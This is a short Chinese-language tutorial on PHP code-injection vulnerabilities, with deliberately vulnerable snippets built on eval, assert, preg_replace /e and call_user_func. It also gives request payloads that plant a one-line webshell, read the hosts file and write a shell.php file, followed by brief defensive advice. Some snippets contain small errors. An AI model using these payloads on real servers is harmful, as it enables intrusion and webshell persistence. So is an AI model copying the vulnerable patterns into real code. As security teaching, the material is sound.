代码注入
1、RCE
代码执行(注入)类似SQL 注入漏洞,SQLi 是将SQL 语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个Web 后门的存在。
1、程序中含有可以执行PHP 代码的函数或者语言结构
2、传入第一点中的参数,客户端可控,直接修改或者影响
2、相关函数和语句
eval() 函数
eval() 会将字符串当作PHP代码来执行
<?php
@$str=$_REQUEST['code'];
eval($str);
?>
assert()函数
assert() 同样会作为PHP 代码执行
<?php
@$str=$_GET['code'];
assert($str);
?>
preg_replace() 函数
preg_replace() 函数作用是对字符串进行正则处理
mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject[,int limit = -1[,int &$count]])
preg_replace('/a/','b',"abcdega");
这段代码的含义是搜索$subject 中匹配$pattern 的部分,以$replacement 进行替换,而$pattern处,及第一个参数存在/e修饰时,$replacement 的值会被当成PHP 代码来执行。
<?php
@$str=$_GET['code'];
preg_replace("/[(.∗)]/e",'\1',$code);
?>
\1表示preg_replace第一次匹配的内容
提交参数?code=[phpinfo()]], phpinfo() 会被执行
call_user_func() 函数
call_user_func() 等函数有调用其他函数的功能,其中一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的代码
以call_user_func() 为例子,该函数的第一个参数作为回调函数
<?php
$fun=$_GET['fun'];
$para=$_GET['para'];
call_user_func($fun,$para);
?>
提交参数 ?fun=assert&para=phpinfo()
动态函数$a($b)
<?php
$a=$_GET['a'];
$b=$_GET['b'];
$a($b);
?>
传参直接获取shell
直接获取shell
提交参数 ?code=@eval($_REQUEST[1])
即可构成一句话木马,密码为[1]。可以使用菜刀连接
获取当前文件的绝对路径
__FILE__ 是PHP 预定义常量,其含义为当前文件的路径。
提交代码 ?code=print(__FILE__);
读文件
?code=var_dump(file_get_contents('c:windowssystem32driversetchosts'));
写文件
利用file_put_contents() 函数写入文件,前提是知道可写文件目录。
提交代码
?code=var_dump(file_put_contents($_POST[1],$_POST[2]));
此时需要借助与hackbar通过post方式提交参数
1=shel.php&2=<?php phpinfo()?>
即可再当前目录下创建一个文件shell.php
3、防御
防御方法
1、尽量不要使用eval(不是函数,是语言结构) 等函数
2、如果使用的话一定要进行严格的过滤
3、preg_replace 放弃使用/e 修饰符
4、修改配置文件(禁用)
disable_functions=assert